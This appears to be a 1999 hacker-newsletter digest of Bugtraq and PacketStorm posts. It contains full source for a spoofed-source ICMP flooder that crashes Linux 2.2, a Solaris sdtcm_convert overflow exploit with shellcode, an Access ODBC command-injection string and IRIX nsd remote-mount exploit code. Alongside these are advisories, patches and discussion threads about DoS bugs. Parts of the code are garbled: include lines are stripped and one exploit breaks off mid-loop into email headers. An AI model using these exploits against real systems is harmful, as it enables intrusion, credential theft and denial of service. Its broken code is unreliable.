FreeBSD 3.0 seem to be unaffected. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Here is the program source (under Linux): -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- #include #include #include #include #include #include #include #include #include #include #include #include struct icmp_hdr { struct iphdr iph; struct icmp icp; char text[1002]; } icmph; int in_cksum(int *ptr, int nbytes) { long sum; u_short oddbyte, answer; sum = 0; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } if (nbytes == 1) { oddbyte = 0; *((u_char *)&oddbyte) = *(u_char *)ptr; sum += oddbyte; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } struct sockaddr_in sock_open(char *address, int socket, int prt) { struct hostent *host; if ((host = gethostbyname(address)) == NULL) { perror("Unable to get host name"); exit(-1); } struct sockaddr_in sin; bzero((char *)&sin, sizeof(sin)); sin.sin_family = PF_INET; sin.sin_port = htons(prt); bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length); return(sin); } void main(int argc, char **argv) { int sock, i, ctr, k; int on = 1; struct sockaddr_in addrs; if (argc < 3) { printf("Usage: %s \n", argv[0]); exit(-1); } for (i = 0; i < 1002; i++) { icmph.text[i] = random() % 255; } sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) { perror("Can't set IP_HDRINCL option on socket"); } if (sock < 0) { exit(-1); } fflush(stdout); for (ctr = 0;ctr < 1001;ctr++) { ctr = ctr % 1000; addrs = sock_open(argv[1], sock, atoi(argv[2])); icmph.iph.version = 4; icmph.iph.ihl = 6; icmph.iph.tot_len = 1024; icmph.iph.id = htons(0x001); icmph.iph.ttl = 255; icmph.iph.protocol = IPPROTO_ICMP; icmph.iph.saddr = ((random() % 255) * 255 * 255 * 255) + ((random() % 255) * 65535) + ((random() % 255) * 255) + (random() % 255); icmph.iph.daddr = addrs.sin_addr.s_addr; icmph.iph.frag_off = htons(0); icmph.icp.icmp_type = random() % 14; icmph.icp.icmp_code = random() % 10; icmph.icp.icmp_cksum = 0; icmph.icp.icmp_id = 2650; icmph.icp.icmp_seq = random() % 255; icmph.icp.icmp_cksum = in_cksum((int *)&icmph.icp, 1024); if (sendto(sock, &icmph, 1024, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1) { if (errno != ENOBUFS) printf("X"); } if (ctr == 0) printf("b00m "); fflush(stdout); } close(sock); } -------------------------------------------------------------------------------- Date: Tue, 1 Jun 1999 23:30:33 +0100 From: Alan Cox To: BUGTRAQ@netspace.org Subject: Linux 2.2 DoS attack Ok problem confirmed. Its not icmp however - in fact the program given has some bugs that cause it. If it had been a correctly written icmp tester it wouldnt have worked. A blessing in disguise. Anyway the fix seems to be this. Sorry it took so long to sort out. --- ../linux.vanilla/net/ipv4/ip_options.c Wed May 12 16:49:38 1999 +++ net/ipv4/ip_options.c Tue Jun 1 22:11:46 1999 @@ -452,7 +452,6 @@ error: if (skb) { icmp_send(skb, ICMP_PARAMETERPROB, 0, htonl((pp_ptr-iph)<<24)); - kfree_skb(skb); } return -EINVAL; } Alan @HWA 20.0 New Allaire Security Bulletin (ASB99-09) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml Date: Tue, 1 Jun 1999 11:45:35 -0700 From: aleph1@UNDERGROUND.ORG To: BUGTRAQ@netspace.org Subject: New Allaire Security Bulletin (ASB99-09) Dear Allaire Customer -- We have recently become aware of a serious security vulnerability that may affect customers using Microsoft Access with ColdFusion. This issue is not a problem with ColdFusion, but can occur when using some versions of the Microsoft Access ODBC driver. We have created a new Allaire Security Bulletin that documents this issue and the steps that customers can take to protect themselves. If you are using Microsoft Access with your Web applications we strongly recommend that you review this new bulletin: ASB99-09: Solutions to Issues that Allow Users to Execute Commands through Microsoft Access You can find this new bulletin and information about other security issues in the Allaire Security Zone: http://www.allaire.com/security As a Web application platform vendor, one of our highest concerns is the security of the systems our customers deploy. We understand how important security is to our customers, and we're committed to providing the technology and information customers need to build secure Web applications. Allaire has set up an email address that customers can use to report security issues associated with an Allaire product: secure@allaire.com. Thank you for your time and consideration on this issue. -- Allaire Security Response Team ---------------------------------------------------------------------------------------- Allaire Security Bulletin (ASB99-09) Solutions to Issues that Allow Users to Execute Commands through Microsoft Access Originally Posted: June 1, 1999 Last Updated: June 1, 1999 Summary Some Microsoft ODBC drivers for Microsoft Access may allow users to execute Visual Basic for Applications (VBA) commands on the hosted server without permission. URL, form and cookie variables in a dynamic query in many development environments (e.g. ColdFusion, ASP, CGI, etc.) can be used to exploit this hole appending malicious VBA statements to existing queries. This problem can be easily fixed by upgrading to the Microsoft ODBC driver for Access included in MDAC 2.1 sp1a, available from Microsoft. In general, Allaire recommends that customers use proper coding methods for validating dynamic query variables passed on URL strings, http forms or cookies. This is not a security issue with ColdFusion itself. However, ColdFusion customers using Access are vulnerable to this issue. (This issue is similar to the vulnerabilities documented in ASB99-04, which are associated with appending malicious SQL statements to query strings sent to some enterprise databases.) Issue In a Web application there are often circumstances where queries are built dynamically using variables that are passed on URLs or in forms. Some versions of the Microsoft Access ODBC driver support the ability to append VBA commands to a SQL string. As a result, a malicious attack could be made by using URL, form or cookie variables to send VBA commands through a query. These VBA commands could potentially be used to damage the server or to gain unauthorized access to information and systems. (The potential for a similar problem using SQL statements and some enterprise database was documented in ASB99-04). Some versions of the Microsoft Access ODBC driver allow for appending VBA commands to a SQL string. The VBA commands are appended by using the pipe character, or Chr(124), which is treated as a reserved character by the Access ODBC driver. See the following MS Knowledge Base article for details: http://support.microsoft.com/support/kb/articles/q147/6/87.asp This reserved character allows users to modify a URL, form or cookie variable to execute VBA commands against the Web server using the ODBC driver. The following string is an example of one that can be used to initiate an attack by writing a file to the web server’s hard drive: '|shell("cmd /c 1 > c:\temp\foo.txt")|' This string could be passed to an application using a URL variable, so the page could be called as follows: http://myserver/page.cfm?x='|shell("cmd /c 1 > c:\temp\foo.txt")|' This code, when executed as part of the following dynamically created query, will cause a file to be created at the location c:\temp\foo.txt. SELECT * FROM USERS WHERE lname = '#URL.X#' This code could also be vulnerable when processing form input from a template using a form variable called 'X'. Please note that you should always validate user-initiated input, including URL, form, and cookie variables. Affected Software Versions ColdFusion Server (all versions and editions) running with Microsoft Access through ODBC What Allaire is Doing This issue is not a problem with ColdFusion, but can occur when using Microsoft Access and some versions for the Access ODBC driver. It is not a problem with ColdFusion, but it can affect ColdFusion applications that use Access. To respond to this issue, Allaire has published an Allaire Security Bulletin (ASB99-09) notifying customers of the problem and remedies that can be used to address it. We have sent a notification of the bulletin to customers who have subscribed to Allaire Security Notifications. What Customers Should Do This issue appears to be fixed by the installation of the Microsoft Access ODBC driver included with MDAC 2.1 sp1a. We strongly recommend that customers install this ODBC driver. It should not adversely affect the functionality of ColdFusion applications using Access. This MDAC can be downloaded from the Microsoft site: http://download.microsoft.com/msdownload/mdac/sp1a/x86/en/mdac_typ.exe In addition, Allaire recommends that customers write their code to validate variables that are passed into SQL statements, configure their database security properly, and use standard database application development practices such as stored procedures where appropriate to protect themselves. These are general requirements of production applications regardless of the development platform. There are many ways to address the issues raised by the risk of malicious SQL statements being inserted into dynamic queries. The Allaire Technical Brief – Securing Databases for ColdFusion Applications, details some of the steps you can take to secure your databases. It is important to note that each individual application may require its own particular steps in both coding and database configuration in order to be fully secured. Some of the techniques for securing database applications built with ColdFusion are detailed in the Allaire Technical Brief - Securing Databases for ColdFusion Applications. Revisions June 1, 1999 -- Bulletin first released. Reporting Security Issues Allaire is committed to addressing security issues and providing customers with the information on how they can protect themselves. If you identify what you believe may be a security issue with an Allaire product, please send an email to secure@allaire.com. We will work to appropriately address and communicate the issue. Receiving Security Bulletins When Allaire becomes aware of a security issue that we believe significantly affects our products or customers, we will notify customers when appropriate. Typically this notification will be in the form of a security bulletin explaining the issue and the response. Allaire customers who would like to receive notification of new security bulletins when they are released can sign up for our security notification service. For additional information on security issues at Allaire, please visit: http://www.allaire.com/security THE INFORMATION PROVIDED BY ALLAIRE IN THIS BULLETIN IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. ALLAIRE DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL ALLAIRE CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF ALLAIRE CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. @HWA 21.0 sdtcm_convert Overflow Exploits( for Intel Solaris 7) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml *============================================================================= sdtcm_convert Overflow Exploits( for Intel Solaris 7) The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551) Written by UNYUN (unewn4th@usa.net) [usage] % gcc ex_sdtcm_convert86.c (This example program) % a.out If no response, hit ctrl+c # ============================================================================= */ #define ADJUST 1 #define OFFSET0 6268 #define OFFSET1 4400 #define LENGTH1 600 #define OFFSET2 5000 #define LENGTH2 3000 #define OFFSET3 6000 #define NOP 0x90 char exploit_code[] = "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0" "\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff" "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0" "\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff" "\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33" "\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88" "\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f" "\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46" "\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01" "\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__(" movl %esp,%eax "); } unsigned long ret_adr; int i; main() { static char x[11000]; putenv("LANG="); memset(x,'a',10000); ret_adr=get_sp()-OFFSET0; for (i = 0; i < 5000 ; i+=4){ x[i+0]=ret_adr & 0xff; x[i+1]=(ret_adr >> 8 ) &0xff; x[i+2]=(ret_adr >> 16 ) &0xff; x[i+3]=(ret_adr >> 24 ) &0xff; } ret_adr=get_sp()-11700; if ((ret_adr & 0xff )==0) ret_adr+=4; printf("Jumping Address = %lx\n",ret_adr); for (i = OFFSET1+ADJUST; i < OFFSET1+LENGTH1 ; i+=4){ x[i+0]=ret_adr & 0xff; x[i+1]=(ret_adr >> 8 ) &0xff; x[i+2]=(ret_adr >> 16 ) &0xff; x[i+3]=(ret_adr >> 24 ) &0xff; } for (i = OFFSET2; i To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: ActiveState Security Advisory Problem -------- PerlScript and Perl-ISAPI that come with ActivePerl 516 and earlier versions, inadequately check the length of path information sent to open(). Due to limits on path and filename length in Windows, this can crash IIS if sufficiently large strings are provided as paths or filenames. Solution --------- This is fixed in ActivePerl 517 Work Around ------------ If you are unable to upgrade to ActivePerl 517 then all path information should be checked for sane lengths before being passed to open(). The maximum length of a path, including drive, directory and filename is 259 characters. The maximum length of the filename portion of a path is 255 characters. The maximum length of the directory portion of a path is 255 characters. example: $filename = substr $filename, 0, 255; open FOO, ">$filename"; General Comments ----------------- Care should be taken when accepting input from users, especially in a web context where users are untrusted and relatively anonymous. When designing CGI scripts some thought should be given to checking user input for sane values. Use of taint mode and warnings (-t and -w) are also highly recommended. The Activators. @HWA 23.0 Exploit in Internet Explorer 5.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml Date: Mon, 31 May 1999 16:18:02 GMT From: THR - To: BUGTRAQ@netspace.org Subject: Exploit in Internet Explorer 5.0 Hi everyone! I have found a bug which will freeze Internet Explorer 5.0 I know that there are *many* bugs that will crasch browsers but what makes this one special is the following: In IE 5.0 Microsoft has fixed the bugs from IE 4.0 that was based on infinit loops in JavaScript. If a JavaScript contains a loop which will cause IE 5.0 to run slowly or be unresponsive, the user will be warned and he/she will be prompted whether the JavaScript should be aborted or not. This exploit is a JavaScript which changes the bgColor in an infinit loop and when you open it you wont get a warning. The browser will just freeze! Get the source code here: http://members.xoom.com/thr_/my/color.txt //THR WWW: http://fly.to/unixhacking --------------------------------------------------------------------- 24/5 1999 This is a new exploit which affects Microsoft Internet Explorer 5.0. When you enter the html document below, IE will freeze and you have to close it with ctrl + alt + del. //THR WWW: http://fly.to/unixhacking -----------Cut here------color.htm--------Start--------- -----------Cut here------color.htm--------End--------- @HWA 24.0 IRIX 6.5 nsd virtual filesystem vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml Date: Mon, 31 May 1999 03:56:37 -0400 From: "Jefferson Ogata (JO317)" To: BUGTRAQ@netspace.org Subject: IRIX 6.5 nsd virtual filesystem vulnerability I've been waiting since February for SGI to post an advisory about this. Enough. /****************************************************************************** IRIX 6.5 nsd virtual filesystem exploit Author: Jefferson Ogata (JO317) Please note that this program comes with NO WARRANTY WHATSOEVER. Your use of this program constitutes your complete acceptance of all liability for any damage or loss caused by the aforesaid use. It is provided to the network community solely to document the existence of a vulnerability in the security implementations of certain versions of IRIX, and may not be used for any illicit purpose. Many of the details of the bug this program exploits have been available to users of SGI's online support system since February 1999. The current revision of IRIX (6.5.3) corrects this bug, at least enough to stop this particular exploit, and I strongly encourage you to bring your systems up to date as quickly as possible. With IRIX 6.5, SGI has moved all name services, NIS services, and DNS lookups into a userland process called nsd, which exports the results of the queries it fields into a virtual filesystem. The virtual filesystem is normally mounted onto the directory /ns by the program /sbin/nsmount, which is invoked by nsd on startup. The nsd daemon itself is exporting the filesystem via NFS3 over a dynamically bound UDP port -- rather than a well-known or settable one -- typically in the 1024-1029 range. On a desktop system, 1024 is a good bet, since nsd is usually the first RPC/UDP service to be started. The NFS filesystem is not registered with mountd, so there is no way to query mountd for a mount filehandle. But because the NFS port is fairly easy to discover through port scanning, and because the mount filehandle nsd uses is simply a string of 32 zeroes, it is trivial to mount the nsd filesystem from a host anywhere on the Internet. nsd will serve an array of NFS requests to anyone. Furthermore, because the service's NFS port is bound dynamically, it is difficult to protect it with a firewall; it may change from one system start to another, or if the daemon is killed and restarted. This program can successfully mount the nsd-exported virtual filesystem >from a remote host onto a machine running IRIX 6.4 or higher. It makes use of the MS_DOXATTR mount flag defined in IRIX 6.4 and higher. I do not know what this flag does at the NFS protocol level, but it allows the client to ask the NFS server not to enforce certain permissions controls against the client. I don't know whether any other vendor NFS client systems support this flag. A clever person might write a userland NFS client that would accept an initial handle, NFS port, etc. as arguments. On an SGI with SGI C compiler, compile with: cc -o nsdadv nsdadv.c Run it this way: nsdadv /mnt sucker.example.com 1024 with obvious substitutions. So what are the security implications of this? Well, at the very least, the nsd filesystem on an NIS server reveals the NIS domain name, and what maps it contains, as well as what classes are being used. By exploring the filesystem shortly after it has been mounted I have been able to retrieve data that should be hidden from me, including shadow password entries from a remote system's shadow file. Beyond retrieving keys and maps, you can also monitor the filesystem for changes. A great deal of information is leaked through the contents of the nsd filesystem. For example, if host A looks up a host B's IP address, a file named B will appear in the /.local/hosts.byname directory in A's nsd filesystem. The file's contents will be the IP address. By the way, though you be unable to chdir into a particular location in the nsd filesystem, you may yet succeed under slightly different conditions. Eventually you can do it. I'm not sure why or when, but nsd gets picky sometimes. Eventually it relents. Specifically, I've found that the entire nsd filesystem appears readable for a few seconds after it is initially mounted. If you can't look at something, unmount the filesystem, remount it, and try again immediately. It also seems that a stat() is sometimes required before a chdir(). Your mileage may vary, but keep trying. You may wish to write a script to mount the nsd filesystem, explore and take inventory of its contents, and unmount the filesystem quickly. Once you've chdir'd into a directory, it appears you can always read it, although you can't necessarily stat its contents. This suggests a strategy of spawning a group of processes each with its cwd set to a subdirectory of the nsd filesystem, in order to retain visibility on the entire filesystem. Each process would generate an inventory of its cwd, and then monitor it for changes. A Perl script could do this well. Another thing: it is possible to create an empty file in nsd's exported filesystem simply by stat()ing a nonexistent filename. This suggests a potential DoS by creating many files in a directory. Remember that the system keeps a local cache in /var/ns, so you may have to wait for cached entries on the target host to expire before you'll see them reappear in the virtual filesystem. For some fairly extensive info on the nsd implementation, take a look at: http://www.bitmover.com/lm/lamed_arch.html ****** What got me into all this was that I found I could no longer run services chrooted if they required DNS. It took considerable effort to come up with a solution to this. This was a fundamental change from IRIX 6.4, and I know I'm not the only one who finds the nsd implementation to be a generally unpleasant direction, in part because it causes umount -t nfs to break system database services. I give SGI points for creativity -- in one sense, using NFS as a database access system is a very slick approach. But the database needs a security model, and the model needs to be implemented correctly. Neither of these needs appears to have been met. So how could SGI fix this? Without going back, SGI could at least make nsd respond only to queries >from localhost (see note below about IRIX 6.5.3). The problem here is that they actually intend to support remote mounts in later releases, in order to supplement or supplant other means of distribution. The web documents indicate this. They could create a well-randomized mount filehandle for the filesystem and pass that to nsmount. Then you couldn't remotely mount the filesystem without guessing the handle -- nontrivial with a 32-byte handle. At the very least, they should provide libraries of regular BIND resolver routines, file-based getpwent, etc. routines, so one could choose the resolution strategy at link time, perhaps by modifying the shared library path. ****** With IRIX release 6.5.3, SGI appears to have fixed this problem, at least to some degree. The exploit does not appear to work as it does against 6.5.2. Further testing is needed, and the behavior should be watched carefully in future versions of IRIX. ******************************************************************************/ #include #include #include #include #include #include #include #include #include #include #include #include #include #include /* Filesystem type name for nsd-exported filesystem. */ #define NSD_FSTYPE "nfs3" /* File the records mounted filesystems. */ #define MTAB_FILE "/etc/mtab" /* Socket address we'll fill in with our destination IP and port. */ struct sockaddr_in sin; /* All zero file handle. This appears to be the base handle for the nsd filesystem. Great security, huh? */ unsigned char fh[NFS_FHSIZE] = { 0 }; /* NFS mount options structure to pass to mount(2). The meanings of these are documented to some extent in /usr/include/sys/fs/nfs_clnt.h. The flags field indicates that this is a soft mount without log messages, and to set the initial timeout and number of retries from fields in this structure. The fh field is a pointer to the filehandle of the mount point, whose size is set by fh_len. As noted above, the mount point filehandle is just 32 zeroes. */ struct nfs_args nx = { &sin, /* addr */ (fhandle_t *) fh, /* fh */ NFSMNT_SOFT|NFSMNT_TIMEO|NFSMNT_RETRANS|NFSMNT_NOAC, /* flags */ 0, /* wsize */ 0, /* rsize */ 100, /* timeo */ 2, /* retrans */ 0, /* hostname */ 0, /* acregmin */ 0, /* acregmax */ 0, /* acdirmin */ 0, /* acdirmax */ 0, /* symttl */ { 0 }, /* base */ 0, /* namemax */ NFS_FHSIZE, /* fh_len */ /* On IRIX 6.4 and up there are also the following... */ /* bdsauto */ /* bdswindow */ /* On IRIX 6.5 there are also the following... */ /* bdsbuflen */ /* pid */ /* maxthreads */ }; void usage (void) { fprintf (stderr, "usage: nsmount_remote directory host port\n\n"); fprintf (stderr, "NFS-mounts the virtual filesystem exported by nsd on via NSD daemon\n"); fprintf (stderr, "port onto .\n\n"); exit (1); } int main (int argc, char **argv) { char *dir; char *host; char *ports; int port; struct hostent *h; int fstype; FILE *mtabf; struct mntent mnt = { 0, 0, NSD_FSTYPE, "soft,timeo=100,retrans=2", 0, 0, }; if (argc != 4) usage (); dir = argv[1]; host = argv[2]; port = atoi ((ports = argv[3])); /* Prepare for host lookup. */ memset ((void *) &sin, 0, sizeof (sin)); sin.sin_family = 2; sin.sin_port = port; /* Look up the host. */ if (inet_aton (host, &sin.sin_addr)) ; else if ((h = gethostbyname (host))) { unsigned long *l = (unsigned long *) *(h->h_addr_list); sin.sin_addr.s_addr = l[0]; } else { fprintf (stderr, "Cannot resolve host %s.\n", host); return 1; } /* Get filesystem type index for nsd filesystem type. */ if ((fstype = sysfs (GETFSIND, NSD_FSTYPE)) < 0) { perror ("sysfs (" NSD_FSTYPE ")"); return 1; } fprintf (stderr, "Mounting nsd " NSD_FSTYPE " fs from %s(%s):%d onto %s\n", host, inet_ntoa (sin.sin_addr), port, dir); /* These flags are documented in /usr/include/sys/mount.h. MS_DOXATTR means "tell server to trust us with attributes" and MS_DATA means "6-argument mount". MS_DOXATTR is a mount option in IRIX 6.4 and up. The attack doesn't seem to work without this option. So even though this program will compile on IRIX 6.2, you need to use an IRIX 6.4 or higher OS to attack nsd. */ if (mount (dir, dir, MS_DOXATTR|MS_DATA, (char *) fstype, &nx, sizeof (nx)) != 0) { perror ("mount"); return 1; } /* Record mount point in /etc/mtab. */ mnt.mnt_fsname = malloc (strlen (host) + sizeof (":nsd@") + strlen (ports) + 1); sprintf (mnt.mnt_fsname, "%s:nsd@%s", host, ports); mnt.mnt_dir = dir; if (!(mtabf = setmntent (MTAB_FILE, "r+"))) { perror ("setmntent"); return 1; } if (addmntent (mtabf, &mnt) < 0) { perror ("addmntent"); return 1; } if (endmntent (mtabf) < 0) { perror ("endmntent"); return 1; } return 0; } @HWA 25.0 a practical attack against ZKS Freedom ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml Date: Sat, 29 May 1999 15:30:24 -0700 From: Wei Dai To: cypherpunks@toad.com, coderpunks@toad.com Subject: a practical attack against ZKS Freedom Although the ZKS Freedom AIP protocol (as described in version 1.0 of the ZKS whitepaper) is conceptually similar to the PipeNet protocol, there are several attacks against ZKS which PipeNet is not susceptible to. The reason is that PipeNet uses end-to-end traffic padding, whereas ZKS only uses link padding. I came up with several attacks against link padding systems while developing PipeNet, which is why I ultimately choose end-to-end padding. However one can argue that end-to-end padding is too costly, and that these attacks are not practical because they require a global observer or the cooperation of one or more of the anonymous router (AIP) operators. ZKS has not publicly made this argument, but since they are probably aware of these earlier attacks they must have followed its reasoning. I hope the practicality of the new attack presented here will change their mind. In this attack, a user creates an anonymous route from himself through a pair of AIPs back to himself. He then increases the traffic through this route until total traffic between the pair of AIPs reach the bandwidth limit set by the ZKS Traffic Shaper. At this point the AIPs no longer send any padding packets to each other, and the real traffic throughput between them can be deduced by subtracting the traffic sent by the attacker from the bandwidth limit. This attack implies that link padding buys virtually no security. An attacker, without access to network sniffers or cooperation of any AIP operator, can strip off link padding and obtain real-time throughput data between all pairs of AIPs. If end-to-end padding is not used, this data would correlate with traffic throughput of individual users, and statistical analysis could then reveal their supposedly anonymous routes. @HWA 26.0 DoS against PC Anywhere ~~~~~~~~~~~~~~~~~~~~~~~~ From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml Date: Fri, 28 May 1999 12:02:15 -0700 From: Chris Radigan To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: DoS against PC Anywhere Hello all, This is my first post to the group so I'll try to keep it as brief as possible. Searching through the bugtraq archives, I came across articles 001732, 001734, 001737, and 001739 regarding PC Anywhere. So, I fired up my telnet client, pointed it at port 5631 on a non-production host, and pasted about 512kb of garbage (I copied & pasted a dll I opened in notepad) into it when PC Anywhere responded with "Please press ". About 200k through this dump, PC Anywhere hangs, utilizing 100% of the CPU, rendering the target host useless but not crashing it. There's your DoS. I ran this attack over TCP/IP against a couple of fully patched NT 4.0 Workstations (SP4), and a couple of fully patched NT 4.0 Servers (SP4), with 802up_a, 802up_b, and hostup_b applied to PC Anywhere, RAS was not installed on any of the hosts. I got the same results on all machines. I got in touch with Symantec development and found out that they do have a fix for this problem, it's a patched aw32tcp.dll, it just hasn't made it to their website yet. I have applied this fix to several machines (all with the afore mentioned PC Anywhere patches applied) and it does indeed fix the problem. Hope this info will help. Thanks for your time. Chris ----------------------------------------------------------------------------- Date: Mon, 31 May 1999 22:24:50 +0200 From: MrJay@GMX.NET To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: DoS against PC Anywhere Hello TRAQers, this is my second list-posting attempt, so please bear with me. Flames will be sent to /dev/nul anyways ;) Concerning PC Anywhere 32 v8.0x, I tried the following attacks: NT 4.0 Workstation (SP4) vs. NT 4.0 Workstation (SP4) and Win 98 (no patches, from what I was told) vs same NT 4.0 Workstation (SP4) All NT 4.0 running PC Anywhere 32 8.0 patched with formerly mentioned Updates except the aw32tcp.dll, which wasn't available to me. Major difference between Chris' and this version: I tested against the German version of PC Anywhere 32. RAS installed, no fancy firewalls, no 'special' security implemented. Not surprisingly the German Version of PC Anywhere didn't react much different. It hung when I posted those ~500KB of trash from the NT 4.0 attacker machine to Port 5631 of the PC Anywhere Host. Result: 100% CPU load, further connections blocked though the Host machine itsself still worked fine and was able to terminate the aw32host service by simply re-starting the Host mode in PC Anywhere. The more interesting one was the Win98 attack. Same procedure, different result. After pasting those 500KB the Server jumps to 100% load for some seconds while working through the trash then it drops back to normal with the attacker's Telnet session again prompting for pressing the 'Enter' key. To make it short, a permanent DoS failed with a Win98 attacker's machine though generating quite some load to the host's 486 CPU ;-) Pheww...because this keeps us safe from about 99% of all attacks ;) Further difference: After pressing 'Enter' (unlike in the NT4.0 attack, where you loose connection) you are prompted for a Username and password.... Could this be due to different possible Host Type options in Telnet (VT 52 on the Win98 vs. VT 100 on NT 4.0)? In this case, could this also be the reason for the different reaction to the attack? Comments? In case this one gets through, thank you for your time. Jay. P.S.: Does anyone know about the release date of the German NT 4.0 Service Pack 5? I couldn't get information on that via the German or U.S. Web-Site. ----------------------------------------------------------------------------- Date: Mon, 31 May 1999 13:34:34 +0200 From: Craig Hind To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: DoS against PC Anywhere Hi, I managed to replicate this and checked Symantec's FTP site. There is a new aw32tcp.dll there dated May 26, 1999. I got it and patched one of my machines and it seems to work, although the description of the file on ftp.symantec.com/public/english_us_canada/products/pcanywhere/pcanywhere32/v er8.0/updates does not mention a denial of service. Regards Craig > -----Original Message----- > From: Chris Radigan [mailto:radigac@CERF.NET] > Sent: Friday, May 28, 1999 21:02 > To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM > Subject: DoS against PC Anywhere > @HWA 27.0 weaknesses in dns label decoding, denial of service attack (code included) (fwd) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml Date: Sun, 30 May 1999 17:16:22 +0200 (CEST) From: Sebastian To: packetstorm@genocide2600.com Subject: weaknesses in dns label decoding, denial of service attack (code included) (fwd) Parts/Attachments: 1 Shown 87 lines Text 2 1.8 KB Application, "zlip.tar.gz" ---------------------------------------- keywords: some dns packet decoders (sniffers, ids systems (?), dns servers) may be vulnerable to malformed compressed domain names inside dns packets. hi, as I played with the DNS RFC (1035 especially) i came up with the idea to create malformed compressed dns domains inside the DNS packet to make it impossible for the DNS packet decoder to decompress it, which might lead to a denial of service attack. On my tests I found my BIND servers resisting all attacks (three different types), but all sniffers I used to view the DNS packets send to the server behaved in a very "special" way. First test (pointing-to-itself-compression (zlip-1.c)) The DNS domain consists out of multiple labels, and message "compression" allows you to let a pointer point to a previous label inside the packet, to save bytes in the DNS packet. I just created a pointer that points to itself, meaning on a recursive domain decompression (like etherreal uses), this will produce effects like segfaulting or hanging. Etherreal alloc's memory until the system crashes, tcpdump stopped working before the packet is received, on SIGINT, it displays the malformed packet, but dropped all other packets: 14:57:59.025013 128.75.9.2.48078 > victim.ns.org.domain: 30993 Type49159 (Class 49168)? Second test (crossreferencing pointers (zlip-2.c)) Similar to the first code, but now two pointer are used to reference each other, speeding up the effect on Etherreal. Results are the same as in the first test. Third test (very long label, decompressed multiple times (zlip-3.c)) This time I used a long label (maximum of 63 characters), and referenced to it a dozend times, this will decode to a very long domain, therefore it may overflow some fixed-sized-buffers (because the rfc says "limited to 500 characters" some programmers may prefer fixed buffers for dns decoders). This is the case in Etherreal, where such a request creates a segmentation fault (due to a buffer overrun). I just tested this with BIND as nameserver, which resisted all this tests, but I included the "exploit" code in this email to allow you to test your IDS, sniffers and nameservers against this. cu, scut -- - scut@nb.in-berlin.de - http://nb.in-berlin.de/scut/ - sacbuctd@ircnet -- -- you don't need a lot of people to be great, you need a few great to be -- -- the best ----------------------------------------------------------------- [ Part 2, "zlip.tar.gz" Application/X-GUNZIP 2.4KB. ] ------------------------------------------------------------------------------------ Date: Mon, 31 May 1999 17:49:53 -0400 From: bobk To: BUGTRAQ@netspace.org Subject: Re: weaknesses in dns label decoding, denial of service attack (code included) On Sun, 30 May 1999, Sebastian wrote: > > keywords: some dns packet decoders (sniffers, ids systems (?), dns > servers) may be vulnerable to malformed compressed domain names > inside dns packets. > > sorry aleph1, if this has already been known or posted =) > > > hi, > > as I played with the DNS RFC (1035 especially) i came up with the idea to > create malformed compressed dns domains inside the DNS packet to make it > impossible for the DNS packet decoder to decompress it, which might lead 